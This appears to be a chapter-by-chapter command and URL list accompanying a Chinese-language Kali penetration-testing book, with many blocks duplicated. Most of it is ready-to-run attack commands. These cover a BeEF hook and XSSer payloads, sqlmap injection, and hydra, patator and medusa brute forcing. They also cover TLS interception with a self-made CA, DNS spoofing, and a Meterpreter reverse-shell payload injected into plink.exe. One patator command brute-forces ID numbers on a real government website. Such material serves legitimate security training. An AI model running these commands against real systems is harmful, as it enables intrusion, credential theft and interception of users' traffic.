指令或網址清單
第1章
測試方法論
政府機關滲透測試服務委外服務案建議書徵求文件第2章
樹莓派Kali映像檔
修正OVT失效的指令碼
建立虛擬機
VirtualBox安裝程式Kali環境設定
安裝VMWare Tools
apt update
apt -y reinstall open-vm-tools-desktop fuse
reboot
apt -y reinstall open-vm-tools-desktop fuse
reboot
修正OVT失效的指令碼
/usr/local/sbin/reOVT.sh」的指令碼
#!/bin/bash
systemctl stop run-vmblock\\x2dfuse.mount
killall -q -w vmtoolsd
systemctl start run-vmblock\\x2dfuse.mount
systemctl enable run-vmblock\\x2dfuse.mount
vmware-user-suid-wrapper vmtoolsd -n vmusr 2 > /dev/null
vmtoolsd -b /var/run/vmroot 2 > /dev/null
systemctl stop run-vmblock\\x2dfuse.mount
killall -q -w vmtoolsd
systemctl start run-vmblock\\x2dfuse.mount
systemctl enable run-vmblock\\x2dfuse.mount
vmware-user-suid-wrapper vmtoolsd -n vmusr 2 > /dev/null
vmtoolsd -b /var/run/vmroot 2 > /dev/null
安裝Firefox
echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt update
apt install firefox-mozilla-build
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt update
apt install firefox-mozilla-build
安裝Chrome
apt update
cd /tmp/
wget -c https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome-stable_current_amd64.deb
## 如果發生套件未滿足相依關依,請先執行「apt-get install -f」後,再重新執行步驟3.
cd /tmp/
wget -c https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome-stable_current_amd64.deb
修正Chrome無法以root身分執行問題
exec -a "$0" "$HERE/chrome" "$@" --user-data-dir --test-type --no-sandbox
Kali安裝於USB隨身碟
下載KALI的USB映像檔
燒錄USB映像檔
下載KALI的USB映像檔
wget https://cdimage.kali.org/kali-2019.1a/kali-linux-2019.1a-amd64.iso
燒錄USB映像檔
dd if=kali-linux-light-2.0-i386.iso of=/dev/sdb bs=512K
Kali安裝於樹莓派
下載kali-linux-2019.2a-rpi3-nexmon.img.xz
下載kali-linux-2019.2a-rpi3-nexmon.img.xz
安裝VNC Server
編輯/etc/systemd/system/tightvncserver.service
變更tightvncserver.service的擁有者與群組,以及檔案使用權限
編輯/etc/systemd/system/tightvncserver.service
[Unit]
Description=TightVNC Server
After=sshd.service
[Service]
Type=dbus
ExecStart=/usr/bin/vncserver :1 -geometry 1280x800
User=root
Type=forking
[Install]
WantedBy=multi-user.target
Description=TightVNC Server
After=sshd.service
[Service]
Type=dbus
ExecStart=/usr/bin/vncserver :1 -geometry 1280x800
User=root
Type=forking
[Install]
WantedBy=multi-user.target
變更tightvncserver.service的擁有者與群組,以及檔案使用權限
chown root:root /etc/systemd/system/tightvncserver.service
chmod 755 /etc/systemd/system/tightvncserver.service
安裝4G上網
USB裝置的類型轉換對照表 編輯/etc/wvdial.conf
USB裝置的類型轉換對照表 編輯/etc/wvdial.conf
[Dialer E3272]
Phone = *99#
APN = internet
Username = username
Password = password
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0
Init3 = AT+CGDCONT=1, "IP","Internet"
Modem = /dev/ttyUSB0
Baud = 460800
Stupid Mode = 1
Phone = *99#
APN = internet
Username = username
Password = password
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0
Init3 = AT+CGDCONT=1, "IP","Internet"
Modem = /dev/ttyUSB0
Baud = 460800
Stupid Mode = 1
第3章
(無資料)
第4章
安裝Nessus
下載Nessus註冊啟動碼
申請Nessus啟動碼
安裝OpenVAS
設定開機自動啟動
編輯/etc/systemd/system/rc-local.service
變更rc-local.service的擁有者與群組,以及檔案使用權限
將rc-local.service設成開機自動執行
建立rc.local
變更rc.local的擁有者與群組,以及檔案使用權限
[Unit]
Description=Execute on Booting
ConditionPathExists=/etc/rc.local
[Service]
Type=forking
ExecStart=/etc/rc.local start
StandardOutput=tty
RemainAfterExit=yes
SysVStartPriority=99
[Install]
WantedBy=multi-user.target
Description=Execute on Booting
ConditionPathExists=/etc/rc.local
[Service]
Type=forking
ExecStart=/etc/rc.local start
StandardOutput=tty
RemainAfterExit=yes
SysVStartPriority=99
[Install]
WantedBy=multi-user.target
變更rc-local.service的擁有者與群組,以及檔案使用權限
chown root:root /etc/systemd/system/rc-local.service
chmod 755 /etc/systemd/system/rc-local.service
chmod 755 /etc/systemd/system/rc-local.service
將rc-local.service設成開機自動執行
systemctl enable rc-local.service
建立rc.local
#! /bin/sh -e
case "$1" in
start)
openvas-start
;;
stop)
openvas-stop
;;
restart)
openvas-start
sleep 5
openvas-stop
;;
*)
echo "Usage: /etc/rc.local {start | stop | restart}"
exit 1
esac
exit 0
case "$1" in
start)
openvas-start
;;
stop)
openvas-stop
;;
restart)
openvas-start
sleep 5
openvas-stop
;;
*)
echo "Usage: /etc/rc.local {start | stop | restart}"
exit 1
esac
exit 0
變更rc.local的擁有者與群組,以及檔案使用權限
chown root:root /etc/rc.local
chmod 755 /etc/rc.local
chmod 755 /etc/rc.local
安裝OWASP ZAP
下載OWASP ZAP第5章
下載及掛載Metasploitable
下載Metasploitable VM映像檔
將metasploitable2移植到VirtualBox
轉換VMware映像檔為VirtualBox格式
轉換VMware映像檔為VirtualBox格式
"C:\Program Files\Oracle\VirtualBox\VBoxManage" clonemedium disk "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux/Metasploitable.vhdx" "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux\Metasploitable.vdi" --format VDI
利用iptables為模擬環境設置防火牆
iptables的封包流向圖第6章
Google Hacking
GHDB:現成的Google Hacking語法Shodan Shodan首頁
維基百科:國碼請參考其他線上whois
https://who.is/
https://www.whois365.com/
http://whois.twnic.net.tw/
https://whois.aliyun.com/
https://www.whois-search.com
https://www.whois.com/
http://www.whois.net
https://www.whois365.com/
http://whois.twnic.net.tw/
https://whois.aliyun.com/
https://www.whois-search.com
https://www.whois.com/
http://www.whois.net
利用漏洞資料庫
https://web.archive.org
HitConZeroDay
http://www.zone-h.org/archive
https://www.exploit-db.com/
https://www.seebug.org/
http://cve.mitre.org/
美國國家漏洞資料庫
HitConZeroDay
http://www.zone-h.org/archive
https://www.exploit-db.com/
https://www.seebug.org/
http://cve.mitre.org/
美國國家漏洞資料庫
DNS轄區資料轉送
DNS Zone transfer範例網站dnstracer
域名伺服器記錄類型列表fierce
header範例
GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: <script src="https://ha.ckers.org/xss.js"></script>
User-Agent: Mozilla/5.0
Host:
Expect: <script src="https://ha.ckers.org/xss.js"></script>
DNSRecon
下載subdomains-top1mil.txt
smtp-user-enum批次執行
for E in 'cat email.lst'
do
swaks --to $E --server test-server.example.com --quit-after RCPT --hide-all
[ $? -ne 0 ] && echo $E
done
do
swaks --to $E --server test-server.example.com --quit-after RCPT --hide-all
[ $? -ne 0 ] && echo $E
done
收集SSL資訊
sslscan SSL線上掃描工具第7章
第8章
Lynis
載荷檔的範例一:payload01.txt
載荷檔的範例二:payload02.txt
GET /foobar/index.php?file=TRAVERSAL HTTP/1.0
Host: www.qwertyfoobar.org
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.qwertyfoobar.org/main.php
Cookie: user=johndoe; abc=1379415096; file=TRAVERSAL; command=get
Host: www.qwertyfoobar.org
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.qwertyfoobar.org/main.php
Cookie: user=johndoe; abc=1379415096; file=TRAVERSAL; command=get
載荷檔的範例二:payload02.txt
GET /unauthenticated/TRAVERSAL HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
第9章
OWASP ZAP
ZAP 2.8.x頭載裝置顯示(HUD)Burp Suite
表格 9‑1:測試範例之帳號及密碼清單
用於uid
|
用於passw
|
|
檔名:user.lst
|
檔名:password.lst
|
|
admin
test
jsmith
user
john
merry
queen
king
damon
|
123456
12345
password
abc123
computer
qwerty
a1b2c3
123abc
admin
test
demo1234
user
|
BeEF
漏洞網頁範例
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transistional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title></title>
<script src="http://192.168.1.106:3000/hook.js">></script>>
</head>>
<body>
<div style="font-size:16pt;color:red">This is BeEF test.</div>
</body>
</html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title></title>
<script src="http://192.168.1.106:3000/hook.js">></script>>
</head>>
<body>
<div style="font-size:16pt;color:red">This is BeEF test.</div>
</body>
</html>
XSSer
GET欄位注入
POST欄位注入
應用Proxy及偽造的Referer
自動注入攻擊載荷,以十六進制編碼
注入自定義的攻擊載荷
對第四階的40組網頁注入攻擊
POST欄位注入,並輸出統計資訊。
簡單注入攻擊
多目標注入
建立含有XSS腳本gif圖檔
GET欄位的外部載荷
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_r/?' -g 'name=XSS' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0'
POST欄位注入
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_s/' -p 'txtName=XSS&mtxMessage=XSS&btnSign=Sign+Guestbook' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0' --follow-redirects --Dom
應用Proxy及偽造的Referer
xsser -i URLs.lst --proxy http://localhost:8118 --referer www.uu.com
自動注入攻擊載荷,以十六進制編碼
xsser -u http://host.com --auto --Hex -v --save
注入自定義的攻擊載荷
xsser -i urls.txt --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
對第四階的40組網頁注入攻擊
xsser -c40 --Cw=4 -u "http://host.com"
POST欄位注入,並輸出統計資訊。
xsser -u "http://host.com" -p "/index.php?target=search&subtarget=top&searchstring=XSS" -s
簡單注入攻擊
xsser -u "http://host.com" -g "bs/?q=XSS" --Dos
多目標注入
xsser -i urls.lst --auto --timeout 20 --threads 16 --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s -v --Dos
建立含有XSS腳本gif圖檔
xsser --imx Picture.gif
GET欄位的外部載荷
xsser -u host.com -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
跨站追蹤(XST)參考資訊
XSSer參考範例一
XSSer參考範例二
第10章
(無資料)
第11章
SQLMap
攻擊crackme範例
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --dbs --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --table -D bank --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --columns -D bank -T user --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+ to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin& sendbutton1=Login" -p "LoginName" --batch
SQLninja
編輯sqlninja.conf
gzip -d /usr/share/doc/sqlninja/sqlninja.conf.example.gz
cp /usr/share/doc/sqlninja/sqlninja.conf.example /root/sqlninja.conf
GET請求的欄位注入之範例
POST請求的欄位注入之範例
--httprequest_start--
GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherp$
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418$
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/p$
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--
GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherp$
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418$
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/p$
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--
POST請求的欄位注入之範例
--httprequest_start--
POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://demo.testfire.net/bank/login.aspx
Cookie: ASP.NET_SessionId=5l023szuvchlvuezvur00d45; amSessionId=71241312664
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
uid=aaa';__SQL2INJECT__&passw=eeee&btnSubmit=Login
--httprequest_end--
POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://demo.testfire.net/bank/login.aspx
Cookie: ASP.NET_SessionId=5l023szuvchlvuezvur00d45; amSessionId=71241312664
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
uid=aaa';__SQL2INJECT__&passw=eeee&btnSubmit=Login
--httprequest_end--
HexorBase
下載Oracle Client for Linux」下載cx_Oracle-5.2.tar.gz
第12章
hydra
猜測Web表單式的登入帳號密碼
第一種格式:
hydra -L ~/user.lst -P ~/password.lst http-post-form://demo.testfire.net/doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"
第二種格式:
hydra -L ~/user.lst -P ~/password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"
hydra -L ~/user.lst -P ~/password.lst http-post-form://demo.testfire.net/doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"
第二種格式:
hydra -L ~/user.lst -P ~/password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"
當hydra遇到中文字
hydra -l root -P pwds.lst www.tester.com:260 http-post-form "/cgi-bin/admin/sessmgr.cgi:user=^USER^&pwd=^PASS^&act=login&savepwd=1:\xe7\x99\xbb\xe5\x85\xa5\xe5\xa4\xb1\xe6\x95\x97"
patator
http_fuzz模組
smtp_rcpt模組
smb_login模組
mssql_login模組
mysql_login模組
FTP模組
Unzip模組
利用http_fuzz模組破解testfire登入帳密
patator http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
patator http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
patator http_fuzz url=http://10.0.0.1/login.php method=POST body='userid=COMBO00&passw=COMBO01' 0=users.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in' -l /tmp/phpmysql
patator http_fuzz url=https://pdis.moj.gov.tw/U100/U102-1.aspx method=POST body='ctl00$ContentPlaceHolder1$txtIDN=FILE0&ctl00$ContentPlaceHolder1$ddlSYEAR=102' 0=/root/Downloads/ID_List.txt follow=1 accept_cookie=1 -x ignore:fgrep='目前未有符合條件'
patator http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
patator http_fuzz url=http://10.0.0.1/login.php method=POST body='userid=COMBO00&passw=COMBO01' 0=users.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in' -l /tmp/phpmysql
patator http_fuzz url=https://pdis.moj.gov.tw/U100/U102-1.aspx method=POST body='ctl00$ContentPlaceHolder1$txtIDN=FILE0&ctl00$ContentPlaceHolder1$ddlSYEAR=102' 0=/root/Downloads/ID_List.txt follow=1 accept_cookie=1 -x ignore:fgrep='目前未有符合條件'
smtp_rcpt模組
patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt
patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt mail_from=bar@example.com -x ignore:fgrep='User unknown' -x retry:code=421
patator smtp_login host=10.0.0.1 user=FILE0@localhost password=FILE1 0=logins.txt 1=passw.txt
patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt mail_from=bar@example.com -x ignore:fgrep='User unknown' -x retry:code=421
patator smtp_login host=10.0.0.1 user=FILE0@localhost password=FILE1 0=logins.txt 1=passw.txt
smb_login模組
smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt
smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_ACCOUNT_LOCKED_OUT
smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_ACCOUNT_LOCKED_OUT
mssql_login模組
patator mssql_login host=10.0.0.1 user=sa password=FILE0 0=passwords.txt -x ignore:fgrep='Login failed for user'
mysql_login模組
patator mysql_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Access denied for user'
FTP模組
patator ftp_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Login incorrect'
ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24
ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24
Unzip模組
patator unzip_pass zipfile=file.zip password=FILE0 0=passwords.txt -x ignore:code!=0
利用http_fuzz模組破解testfire登入帳密
patator http_fuzz url=http://demo.testfire.net/doLogin body="uid=FILE0&passw=FILE1&btnSubmit=Login" method=POST follow=1 accept_cookie=1 persistent=1 before_urls=http://demo.testfire.net/login.jsp 0=/root/user.lst 1=/root/password.lst -x ignore:fgrep="Login Failed"
Medusa
cvs模組
ftp模組
http模組
imap模組
mysql模組
pcanywhere模組
pop3模組
postgres模組
rsh模組
smbnt模組
smtp-vrfy模組
smtp模組
snmp模組
ssh模組
svn模組
telnet模組
vnc模組
Web-form模組
medusa -M cvs -m DIR:/some_project。
ftp模組
medusa -M ftp -h host -u username -p password
medusa -M ftp -h host -u username -p password -s
medusa -M ftp -h host -u username -p password -m MODE:EXPLICIT
medusa -M ftp -h host -u username -p password -s
medusa -M ftp -h host -u username -p password -m MODE:EXPLICIT
http模組
medusa -M http -m USER-AGENT:"g3rg3 gerg" -m DIR:/exchange/
medusa -M http -m CUSTOM-HEADER:"Cookie: SMCHALLENGE=YES"
medusa -M http -m CUSTOM-HEADER:"Cookie: SMCHALLENGE=YES"
imap模組
medusa -M imap -m AUTH:PLAIN -m TAG:A01 -m DOMAIN:mydm -h host -u foo -p bar
medusa -M imap -m AUTH:NTLM -m DOMAIN:mydm -h host -u foo -p bar
medusa -M imap -m AUTH:NTLM -h host -u foo@mydm -p bar
medusa -M imap -m AUTH:LOGIN -h host -u 'mydm\\foo' -p bar
medusa -M imap -m AUTH:NTLM -m DOMAIN:mydm -h host -u foo -p bar
medusa -M imap -m AUTH:NTLM -h host -u foo@mydm -p bar
medusa -M imap -m AUTH:LOGIN -h host -u 'mydm\\foo' -p bar
mysql模組
medusa -M mysql -h 192.168.18.15 -u userId -p pAssw0rd
medusa -M mysql -h 192.168.18.15 -u userId -p 39b52a209cf03d62 -m PASS:HASH
medusa -M mysql -h 192.168.18.15 -u userId -p 39b52a209cf03d62 -m PASS:HASH
pcanywhere模組
medusa -M pcanywhere -h 192.168.18.15 -u userId -p pAssw0rd -m DOMAIN:mydm
pop3模組
medusa -M pop3 -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst
medusa -M pop3 -m DOMAIN:hacker.com -h 192.168.18.131 -U user.lst -P password.lst
medusa -M pop3 -m DOMAIN:hacker.com -h 192.168.18.131 -U user.lst -P password.lst
postgres模組
medusa -M postgres -m DB:msf -h 127.0.0.1 -u msf -p msfpass
rsh模組
medusa -M rsh -h 192.168.18.133 -U user.lst -p pass
smbnt模組
medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst
medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst -m GROUP:mydm
medusa -M smbnt -h 192.168.18.131 -C pwdump.txt -m PASS:HASH -m GROUP:mydm
medusa -M smbnt -H hosts.txt -C pwdump.txt -U users.lst -m PASS:HASH
medusa -M smbnt -H hosts.txt -u administrator -p 92D887C8010492C2944E2DF489A880E4:7A2EDE4F51BC5A03984C6BA2C239CF63::: -m PASS:HASH
medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst -m GROUP:mydm
medusa -M smbnt -h 192.168.18.131 -C pwdump.txt -m PASS:HASH -m GROUP:mydm
medusa -M smbnt -H hosts.txt -C pwdump.txt -U users.lst -m PASS:HASH
medusa -M smbnt -H hosts.txt -u administrator -p 92D887C8010492C2944E2DF489A880E4:7A2EDE4F51BC5A03984C6BA2C239CF63::: -m PASS:HASH
smtp-vrfy模組
medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p hacker.com
smtp模組
medusa -M smtp -m AUTH:NTLM -h 192.168.18.56 -U users.lst -P password.lst
medusa -M smtp -m EHLO:world -h 192.168.18.56 -U users.lst -P password.lst
medusa -M smtp -m EHLO:world -h 192.168.18.56 -U users.lst -P password.lst
snmp模組
medusa -M snmp -m TIMEOUT:2 -m ACCESS:WRITE" -h 192.168.18.199 -U users.lst -P password.lst
ssh模組
medusa -M ssh -m BANNER:SSH-2.0-GOODMAN -h 192.168.18.131 -U users.lst -P password.lst
svn模組
medusa -M svn -m BRANCH:"svn://172.31.10.144/comm-lib" -h 172.31.10.144 -U users.lst -P password.lst
telnet模組
medusa -M telnet -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst
vnc模組
medusa -M vnc -m MAXSLEEP:120 -m DOMAIN:mydm -h 192.168.18.2 -U user.lst -P password.lst
Web-form模組
medusa -h testasp.vulnweb.com -U ~/user.lst -P ~/password.lst -M web-form -m FORM-DATA:"post?tfUName=&tfUPass=" -m USER-AGENT:"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36" -m FORM:"/Login.asp?RetURL=%2FDefault%2Easp%3F" -m DENY-SIGNAL:"Invalid login!" -m CUSTOM-HEADER:"Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F"
rainbowCrack
彩虹表的基本原理購買彩虹表
第13章
sslsniff
建立偽冒憑證
openssl req -config openssl.cnf -new -x509 -extensions v3_ca -keyout private/myca.key -out myca.crt -days 3650
openssl ca -config openssl.cnf -policy policy_anything -out mytest.crt -infiles mytest.csr
mkdir /usr/share/sslsniff/certs/spoofed_site/
cat mytest.crt mytest.key > /usr/share/sslsniff/certs/spoofed_site/mytest.pem
openssl ca -config openssl.cnf -policy policy_anything -out mytest.crt -infiles mytest.csr
mkdir /usr/share/sslsniff/certs/spoofed_site/
cat mytest.crt mytest.key > /usr/share/sslsniff/certs/spoofed_site/mytest.pem
SSLsplit
使用OpenSSL建立CA私鑰ca.key和憑證ca.crt
建立x509v3ca.cnf。
先產生CA私鑰(ca.key),再利用此私鑰簽署ca.crt憑證檔:
iptables轉發使用者的流量
執行sslsplit代理
建立x509v3ca.cnf。
[ req ]
distinguished_name = reqdn
[ reqdn ]
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
先產生CA私鑰(ca.key),再利用此私鑰簽署ca.crt憑證檔:
openssl genrsa -out ca.key 1024
openssl req -new -nodes -x509 -sha1 -out ca.crt -key ca.key -config x509v3ca.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650
openssl req -new -nodes -x509 -sha1 -out ca.crt -key ca.key -config x509v3ca.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650
iptables轉發使用者的流量
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
執行sslsplit代理
sslsplit -D -l /root/sslsplit/connections.log -S /root/sslsplit/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
Ghost Phisher
無線網卡選購資訊一無線網卡選購資訊二
DNSChef
--file選項的檔案範例
dnschef範例
dnschef.ini參考範例
[A]
mail.google.com.tw=192.168.18.133
mail.yahoo.com=192.168.18.133
*.google.com=192.168.18.130
*.yahoo.com=192.168.18.130
[AAAA]
mail.google.com.tw=fe80::20c:29ff:fef0:b63
mail.yahoo.com=fe80::20c:29ff:fef0:b63
*.google.com.com=fe80::20c:29ff:fef0:b61
*.yahoo.com=fe80::20c:29ff:fef0:b61
[MX]
*.google.com=mail.google.com.tw
*.yahoo.com=mail.yahoo.com
[NS]
*.google.com=ns1.google.com
*.yahoo.com=ns1.yahoo.com
*.google.com=ns2.google.com
*.yahoo.com=ns2.yahoo.com
[CNAME] # Queries for alias records
*.google.com.com=www.google.com
*.yahoo.com.com=w3.yahoo.com
[TXT]
*.google.com=This a fake GOOGLE Site!
*.yahoo.com=This a fake GOOGLE Site!
[PTR]
*.18.168.192.in-addr.arpa=google.com
*.18.168.192.in-addr.arpa=yahoo.com
[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.google.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
*.yahoo.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
# 詳細範例可參考:https://github.com/iphelix/dnschef/blob/master/dnschef.ini
mail.google.com.tw=192.168.18.133
mail.yahoo.com=192.168.18.133
*.google.com=192.168.18.130
*.yahoo.com=192.168.18.130
[AAAA]
mail.google.com.tw=fe80::20c:29ff:fef0:b63
mail.yahoo.com=fe80::20c:29ff:fef0:b63
*.google.com.com=fe80::20c:29ff:fef0:b61
*.yahoo.com=fe80::20c:29ff:fef0:b61
[MX]
*.google.com=mail.google.com.tw
*.yahoo.com=mail.yahoo.com
[NS]
*.google.com=ns1.google.com
*.yahoo.com=ns1.yahoo.com
*.google.com=ns2.google.com
*.yahoo.com=ns2.yahoo.com
[CNAME] # Queries for alias records
*.google.com.com=www.google.com
*.yahoo.com.com=w3.yahoo.com
[TXT]
*.google.com=This a fake GOOGLE Site!
*.yahoo.com=This a fake GOOGLE Site!
[PTR]
*.18.168.192.in-addr.arpa=google.com
*.18.168.192.in-addr.arpa=yahoo.com
[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.google.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
*.yahoo.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
# 詳細範例可參考:https://github.com/iphelix/dnschef/blob/master/dnschef.ini
dnschef範例
dnschef --fakeip=192.168.18.130 --fakealias=www.google.com,tw.yahoo.com --interface 0.0.0.0 -q
dnschef.ini參考範例
第14章
通訊掩護
Windows版本stunnelWindows版本HTTPTunnel
shellter
封裝plink.exe
cp /usr/share/windows-binaries/plink.exe /tmp/
shellter -a -f /tmp/plink.exe -p Meterpreter_Reverse_TCP --lhost 192.168.18.133 --port 4444 --junk
shellter -a -f /tmp/plink.exe -p Meterpreter_Reverse_TCP --lhost 192.168.18.133 --port 4444 --junk
建立msfconsole反向連線監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.18.133
set LPORT 4444
run
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.18.133
set LPORT 4444
run
Backdoor Factory
安裝舊版Backdoor Factory
apt autopurge backdoor-factory
cd /usr/share/
git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh
ln -s /usr/share/the-backdoor-factory/backdoor.py /usr/bin/backdoor-factory
cd /usr/share/
git clone https://github.com/secretsquirrel/the-backdoor-factory
